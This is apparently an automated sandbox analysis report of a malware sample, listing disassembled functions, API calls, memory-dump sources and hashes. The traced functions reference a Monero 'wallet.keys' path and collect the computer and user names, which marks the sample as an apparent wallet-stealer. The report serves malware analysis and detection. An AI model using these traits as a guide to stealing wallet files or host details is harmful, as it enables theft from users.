Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrlen.KERNEL32(00000000), ref: 003CB42E
lstrlen.KERNEL32(00000000), ref: 003CB442

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 4e36d58624209edbbf7a74772b903b731cc2cbd8e6a4abf1a9737a8dd43dd2d5
Instruction ID: 540de12bbdce8ca33067f429103fc71d2943b448051035f2e31417d531d3f735
Opcode Fuzzy Hash: 4e36d58624209edbbf7a74772b903b731cc2cbd8e6a4abf1a9737a8dd43dd2d5
Instruction Fuzzy Hash: CB7155739106589BCF06FBE0EE92DEE7779BF14300F404119F502AA291EF346A09DB62

Function 003C6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 003C6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 003C6753

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5ca2cff8011090f9c7eb4e4aaad130c5467bd6237a0a731d02cf2379c0c473f
Instruction ID: 83f3546573c88b6983b61abbc5a4a2f43cf6b635a7003c3c6928eca7968c5622
Opcode Fuzzy Hash: c5ca2cff8011090f9c7eb4e4aaad130c5467bd6237a0a731d02cf2379c0c473f
Instruction Fuzzy Hash: 6A41C774A00209EFCB45CF98C495BADBBB1FB48314F2486A9E9599B345C731AE91CB84

Function 003C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003C10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003C10F7

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1beb428222cc9ac6bbfa8990122f329d5d9cd8f4f00cd9f3e59453bbca7b4894
Instruction ID: 065970c489a03c08ef9caa2e37a0c998c162a0af04453e5bbbfd7dccd70a1c6c
Opcode Fuzzy Hash: 1beb428222cc9ac6bbfa8990122f329d5d9cd8f4f00cd9f3e59453bbca7b4894
Instruction Fuzzy Hash: 6DF0E2B1681318BBE7149BA4AC59FABB7E8E705B55F305448F504E7280D671AE00DBA1

Function 003D8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,003C1B54,?,?,003E564C,?,?,003E0E1F), ref: 003D8D9F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9e8d112ba9d53a9583f5065bd2f8bf3330fd33e18464c84ffa40b13c1d275b82
Instruction ID: 1d1c6e70677773b8122c870807d5acfce353212e1082c176a02b59e16fb248c6
Opcode Fuzzy Hash: 9e8d112ba9d53a9583f5065bd2f8bf3330fd33e18464c84ffa40b13c1d275b82
Instruction Fuzzy Hash: CFF0AC75C00208EBCF05EF94E5456DDBB75EB14310F10819AE8556B3D0EB746A55DB81

Function 003D8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a886eb1cfea402059a3e96a9f488ffc6adcd2c6f58eaec6a0a7127e29b970d1
Instruction ID: 18d48525b54012269990032f2696f972ea28f30cbaace552bae9a62240976ff7
Opcode Fuzzy Hash: 9a886eb1cfea402059a3e96a9f488ffc6adcd2c6f58eaec6a0a7127e29b970d1
Instruction Fuzzy Hash: 7DE0127594034C6BDB51EB90DC96FAE737C9B44B01F004295BA0C5A1C0DE70AB858B91

Function 003C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

ExitProcess.KERNEL32 ref: 003C11C6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 0082cf759ef70b4110f222ad5f179a98c69207813e7cab3de249815d93ccc3de
Instruction ID: 1a0fc94fe00014ee273caf0fa99ca43e2df7f745e7f40c0bf2967c53a9d544d2
Opcode Fuzzy Hash: 0082cf759ef70b4110f222ad5f179a98c69207813e7cab3de249815d93ccc3de
Instruction Fuzzy Hash: 97E012B6D9430153CB0273F4BC0BF2B339D5B15389F08142AFA05D6343FA29F8109666

Non-executed Functions

Function 6C595440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C595492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5954A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5954BE
__Init_thread_footer.LIBCMT ref: 6C5954DB

Part of subcall function 6C5BAB3F: EnterCriticalSection.KERNEL32(6C60E370,?,?,6C583527,6C60F6CC,?,?,?,?,?,?,?,?,6C583284), ref: 6C5BAB49
Part of subcall function 6C5BAB3F: LeaveCriticalSection.KERNEL32(6C60E370,?,6C583527,6C60F6CC,?,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5BAB7C

Part of subcall function 6C5BCBE8: GetCurrentProcess.KERNEL32(?,6C5831A7), ref: 6C5BCBF1
Part of subcall function 6C5BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5831A7), ref: 6C5BCBFA

GetCurrentThreadId.KERNEL32 ref: 6C5954F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C595516
GetCurrentThreadId.KERNEL32 ref: 6C59556A
AcquireSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C595577
moz_xmalloc.MOZGLUE(00000070), ref: 6C595585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C595590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C5955E6
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C595606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C595616

Part of subcall function 6C5BAB89: EnterCriticalSection.KERNEL32(6C60E370,?,?,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284), ref: 6C5BAB94
Part of subcall function 6C5BAB89: LeaveCriticalSection.KERNEL32(6C60E370,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5BABD1

GetCurrentThreadId.KERNEL32 ref: 6C59563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C595646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C59567C
free.MOZGLUE(?), ref: 6C5956AE

Part of subcall function 6C5A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5A5EDB
Part of subcall function 6C5A5E90: memset.VCRUNTIME140(ew^l,000000E5,?), ref: 6C5A5F27
Part of subcall function 6C5A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5A5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C5956E8
GetCurrentThreadId.KERNEL32 ref: 6C595707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C59570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C595729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C59574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C59576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C595796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C5957B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C5957CA

Strings

[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C595BBE
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C595717
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C595D2B
[I %d/%d] profiler_init, xrefs: 6C59564E
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5957C5
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C595AC9
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C595749
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5954A3
MOZ_BASE_PROFILER_HELP, xrefs: 6C595511
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C595724
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C595766
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C595C56
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C59548D
MOZ_PROFILER_STARTUP, xrefs: 6C5955E1
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C595CF9
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5954B9
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C595791
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C595D1C
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C59584E
GeckoMain, xrefs: 6C595554, 6C5955D5
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C5956E3
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C595D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C595B38
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C595D01
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C5957AE

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

